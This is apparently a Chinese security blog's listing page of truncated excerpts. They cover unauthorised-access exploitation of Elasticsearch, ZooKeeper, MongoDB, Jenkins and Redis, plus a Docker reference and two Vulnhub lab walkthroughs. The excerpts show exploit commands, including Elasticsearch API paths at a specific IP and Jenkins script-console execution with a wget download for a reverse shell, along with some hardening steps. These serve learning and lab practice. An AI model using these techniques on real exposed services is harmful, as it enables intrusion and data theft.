ElasticSearch 未授权访问
方糖的博客
安全小技巧
新的一年快到了….
剪刀石头布,哈,我又赢了
2023
05-16
漏洞介绍Elasticsearch 是一款 java 编写的企业级搜索服务。越来越多的公司使用 ELK 作为日志分析,启动此服务默认会开放9200端口,可被非法操作数据。
漏洞检测:默认端口9200
相当于一个API,任何人访问这个地址,就可以调用api,进行数据的增删改操作。
返回内容中包含”You Know, for Search”
漏洞利用123456789101112利用接口http://x.x.x.x:9200/_nodeshttp://x.x.x.x:9200/_riverhttp://101.198.161.130:9200/_cat/indices/http://101.198.161.130:9200/_plugin/head/http://101.198.161.130:9200/_nodes?prettifyhttp://101.198.161.130:9200/_statushttp://101.198.161.130:9200/_search?pret ...
ZooKeeper 未授权访问
方糖的博客
安全小技巧
新的一年快到了….
剪刀石头布,哈,我又赢了
2023
05-16
漏洞描述Zookeeper 的默认开放端口是2181。Zookeeper 安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用 Zookeeper,通过服务器收集敏感信息或者在 Zookeeper 集群内进行破坏
比如:kill命令。攻击者能够执行所有只允许由管理员运行的命令。
默认运行在 2181 端口
环境搭建1234567wget https://mirrors.tuna.tsinghua.edu.cn/apache/zookeeper/zookeeper-3.4.14/zookeeper-3.4.14-bin.tar.gztar -xvf filename.tar.gz 解包cd zookeeper/src mv zoo_sample.cfg zoo.cfg 进入目录修改配置文件名称未zoo.cfg../bin/zkServer.sh start 启动服务
漏洞复现1234567891011121314echo conf | nc x ...
MongoDB 未授权访问
方糖的博客
安全小技巧
新的一年快到了….
剪刀石头布,哈,我又赢了
2023
05-16
漏洞介绍默认开启 MongoDB 服务不添加任何参数时,是没有任何权限验证的,可以直接无密码连接登陆,端口 27017
漏洞利用1mongo --host ip --port 27017 直接连接数据库
漏洞加固
为 MongoDB 添加认证
启动时候添加 —auth参数
给 MongoDB 添加用户
12345use admin #使用admin库db.addUser("root", "123456") #添加用户名root密码123456的用户db.auth("root","123456") #验证下是否添加成功,返回1说明成功
禁用HTTP 和REST 端口
1234MongoDB 自身带有一个 HTTP 服务和并支持 REST 接口。在2.6以后这些接口默认是关闭的。mongoDB 默认会使用默认端口监听web服务,一般不需要通过 web 方式进行远程管理,建议禁用。修改配置 ...
JenKins 未授权访问
方糖的博客
安全小技巧
新的一年快到了….
剪刀石头布,哈,我又赢了
2023
05-16
永远新的开始啊
漏洞描述默认情况下 Jenkins 面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。
漏洞利用命令执行地址
http://192.168.56.114:8080/script
http://192.168.56.114:8080/manage
123456789101112131415161718命令执行println "ifconfig -a".execute().text 执行ifconfig 命令println "wget http://127.0.0.1/1.py".execute().text 下载py文件反弹shell写文件shellnew File("/tmp/1.py").write("""123"""); 使用命令 ...
redis 未授权访问
方糖的博客
安全小技巧
新的一年快到了….
剪刀石头布,哈,我又赢了
2023
05-15
永远新的开始啊
简介Redis 在某些情况下,绑定在0.0.0.0 暴露公网访问的时候,没有防火墙策略,没有密码认证的情况下,会导致任意目标访问 redis 以及读取写入数据。
利用条件
绑定在 0.0.0.0:6379,没有安全策略ip限制,直接暴露在公网
没有设置 redis 密码认证,可以免密码登陆
高级利用,root 身份运行
复现环境
centos 7
redis wget http://download.redis.io/releases/redis-4.0.8.tar.gz
123456cd redismakemake install 将redis-cli redis-server 安装到/usr/bincp redis.conf /etc修改redis.conf 配置文件 bind 0.0.0.0,关闭密码认证,关闭服务器防火墙root启动
复现过程123456789101112131415161718192021222324252627282930313 ...
Docker使用参考
你好啊
吃了么,睡了么
有拥抱么,有晚安么
剪刀石头布,哈,我又赢了
Docker简介2022
11-26
Docker官网:https://www.docker.com/
描述: Docker 是一个用于开发、交付和运行应用程序的开放平台。 Docker 使您能够将应用程序与基础架构分开,以便 您可以快速交付软件。使用 Docker,您可以管理您的基础架构 以与管理应用程序相同的方式。通过利用 Docker 的 快速传送、测试和部署代码的方法,您可以 显著减少编写代码和在生产环境中运行代码之间的延迟。
基础教程2022
11-26
1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889docker ps 列出正在运行的容器docker ps -a 列出所有容器docker ps ...
Vulnhub靶场CHRONOS-1
你好啊
吃了么,睡了么
有拥抱么,有晚安么
剪刀石头布,哈,我又赢了
靶场简介2022
11-12
Vulnhub地址:https://www.vulnhub.com/entry/chronos-1,735/
描述:
难度:中等目标:获得root权限,flag*2
涉及的任务:端口扫描WEB侦查命令注入数据编解码搜索引擎框架漏洞利用代码审计NC反弹shell本地提权
系统环境2022
11-12
操作系统:物理机:Arch linux虚拟机:kali linux虚拟机程序:Virtualbox
使用程序:sudo netdiscover -i eth1 用于目标发现arp-scan 用于目标发现nmap 用于服务识别nc 用于shell反弹hydra 用于密码破解burpsuite 用于web测试
测试过程主机发现123sudo netdiscover -i eth1 指定网卡,对目标网段进行arp主机发现确定目标 192.168.56.109 为测试靶机目标
服务识别12345nmap -p- 192.168 ...
Vulnhub靶场BoredHackerBlog
你好啊
吃了么,睡了么
有拥抱么,有晚安么
剪刀石头布,哈,我又赢了
靶场简介2022
11-12
Vulnhub地址:https://www.vulnhub.com/entry/boredhackerblog-cloud-av,453/
描述:这是一个云端反病毒扫描程序!是一种基于云的防病毒扫描服务。目前,它处于测试模式。系统要求您测试设置并查找漏洞并升级隐私。
难度:简单目标:获得root权限
涉及的任务:端口扫描网页应用攻击SQL注入命令注入暴力破解代码分析
系统环境2022
11-12
操作系统:物理机:Arch linux虚拟机:kali linux虚拟机程序:Virtualbox
使用程序:arp-scan 用于目标发现ping 用于目标发现arping 用于目标发现nmap 用于服务识别nc 用于shell反弹hydra 用于密码破解burpsuite 用于web测试
测试过程主机发现123456sudo arp-scan -I eth0 -l ...